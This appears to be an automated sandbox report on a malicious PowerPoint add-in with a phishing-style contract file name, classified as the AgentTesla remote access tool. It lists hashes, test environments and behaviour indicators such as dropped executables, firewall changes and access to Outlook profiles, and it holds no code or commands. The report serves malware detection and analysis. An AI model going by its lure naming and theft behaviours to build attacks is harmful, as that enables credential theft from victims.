General
-
Target
Order Contract_signed (2NQ39NGAY0GD).ppam
-
Size
8KB
-
Sample
211125-ve5bfabbg7
-
MD5
4d5fee148b7a8eccf48baf9e46bd0aca
-
SHA1
cb17124014df5d5454c9aa8d6468fe987b2a1280
-
SHA256
9519fae35009182236a7050629d629cb5d4978b868f3168f1107fe4e3a3711b8
-
SHA512
b89fa408ff04280aa2aeed5164e89d96b8c1b05e9c2ef3d671abbbd838293296f74fa824202d1a975fb6ce3799e794557cd6a2be5d42354e2a133340d5f4edc2
Static task
static1
Behavioral task
behavioral1
Sample
Order Contract_signed (2NQ39NGAY0GD).ppam
Resource
win7-en-20211104
Behavioral task
behavioral2
Sample
Order Contract_signed (2NQ39NGAY0GD).ppam
Resource
win10-en-20211014
Malware Config
Targets
-
-
Target
Order Contract_signed (2NQ39NGAY0GD).ppam
-
Size
8KB
-
MD5
4d5fee148b7a8eccf48baf9e46bd0aca
-
SHA1
cb17124014df5d5454c9aa8d6468fe987b2a1280
-
SHA256
9519fae35009182236a7050629d629cb5d4978b868f3168f1107fe4e3a3711b8
-
SHA512
b89fa408ff04280aa2aeed5164e89d96b8c1b05e9c2ef3d671abbbd838293296f74fa824202d1a975fb6ce3799e794557cd6a2be5d42354e2a133340d5f4edc2
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
AgentTesla Payload
-
Blocklisted process makes network request
-
Drops file in Drivers directory
-
Executes dropped EXE
-
Modifies Windows Firewall
-
Loads dropped DLL
-
Accesses Microsoft Outlook profiles
-
Suspicious use of SetThreadContext
-